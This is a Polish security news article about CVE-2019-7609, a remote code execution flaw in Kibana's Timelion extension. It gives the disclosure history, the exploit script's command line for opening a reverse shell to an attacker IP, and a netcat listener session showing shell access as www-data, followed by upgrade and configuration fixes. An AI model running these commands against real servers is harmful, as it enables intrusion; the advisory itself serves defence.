2

1 października został opublikowany eksploit wykorzystujący już załataną lukę w komponencie GUI do wizualizacji danych Elasticsearch o nazwie Kibana. Elasticsearch i Kibana są częściami popularnego stosu narzędzi o nazwie Elastic Stack (znanego również jako ELK Stack) – serii otwartych aplikacji służących do scentralizowanego zarządzania logami i nie tylko. CVE-2019-7609 to luka w zabezpieczeniach umożliwiająca wykonywanie dowolnego kodu w rozszerzeniu Kibany – Timelion. Luka została naprawiona w lutym 2019. Zgodnie z poradą firmy Elastic dotyczącą luki osoba atakująca, które ma dostęp do aplikacji Kibana oraz rozszerzenia Timelion “może wysłać żądanie, które spróbuje wykonać kod JavaScript”, co może spowodować, że zostanie wykonane dowolne polecenie na hoście o tych samych uprawnieniach, na których jest uruchomiony silnik nodejs Kibany.

14 października Michał Bentkowski – badacz bezpieczeństwa w firmie Securitum, wygłosił wykład na OWASP Poland Day na temat ataku Prototype Pollution. Slajdy z prezentacji zawierającej jego badania nad luką oraz dowodem koncepcji (ang. PoC – proof of concept) zostały opublikowane na stronie slides. 16 października badacz bezpieczeństwa Henry Chen z Alibaba Cloud podzielił się informacją o PoCu na twitterze. Badania Michała stały się podstawą do napisania eksploita opublikowanego w tym tygodniu. Sprawdza on czy docelowa wersja Kibany jest podatna na atak (czyli pozytywnie oznacza te przed 5.6.15 oraz 6.6.1), jeśli tak to skrypt podejmuje próbę utworzenia powłoki zwrotnej (ang. reverse shell) na podatnym hoście:

./kibana-rce.py -u http://host.ofiary:5601 -host 10.82.22.26 -port 8888 --shell
[+] http://host.ofiary:5601 maybe exists CVE-2019-7609 (kibana < 6.6.1 RCE) vulnerability
[+] reverse shell completely! please check session on: 10.82.22.26:8888

Na zdalnym serwerze, który wskazujemy jako ten, który będzie czekał na połączenie się z poziomu powłoki hosta ofiary powinniśmy zobaczyć:

root@atakujacy.host:~# nc -l 8888
www-data@host.ofiary:~$ uname -a
uname -a
Linux host.ofiary 4.10.0-42-generic #46~16.04.1-Ubuntu 2017 x86_64 GNU/Linux
www-data@host.ofiary:~$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Aktualnie Shodan zgłasza 7.343 publicznie dostępne serwisy Kibany. Oczywiście część z nich posiada wersje już niepodatne; inne są zabezpieczone mechanizmem uwierzytelnienia.

Rozwiązanie:

Administratorzy i użytkownicy korzystający z stosu ELK powinni dokonać aktualizacji do co najmniej wersji 5.6.15 oraz 6.6.1 lub nowszych. Jeśli jednak aktualizacja nie jest obecnie możliwa, możemy wyłączyć rozszerzenie Timelion poprzez modyfikację pliku konfiguracyjnego Kibany kibana.yml i dodanie do niego ustawienia: timelion.enabled: false.

Więcej informacji: Kibana exploit